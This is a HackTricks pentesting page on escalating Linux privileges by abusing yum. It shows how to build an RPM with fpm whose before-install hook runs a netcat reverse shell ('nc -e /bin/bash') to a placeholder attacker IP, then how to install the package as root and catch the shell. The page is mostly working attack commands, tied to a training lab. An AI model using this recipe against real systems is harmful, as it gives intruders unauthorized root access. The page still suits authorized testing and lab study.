hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

30 lines
1.5 KiB
Markdown
Raw Normal View History

2020-11-26 04:33:08 +00:00
# Exploiting Yum
Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/).
## Executing arbitrary commands via RPM Packages
### Checking the Environment
In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.
#### A working example of this vector
A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com).
### Packing an RPM
In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm).
The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.
```text
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
```
## Catching a shell
Using the above example and assuming `yum` can be executed as a higher-privileged user.
1. **Transfer** the rpm to the host
2. **Start** a listener on your local host such as the [example netcat listener](/shells/shells/linux#netcat)
3. **Install** the vulnerable package `yum localinstall -y exploited-1.0-1.noarch.rpm`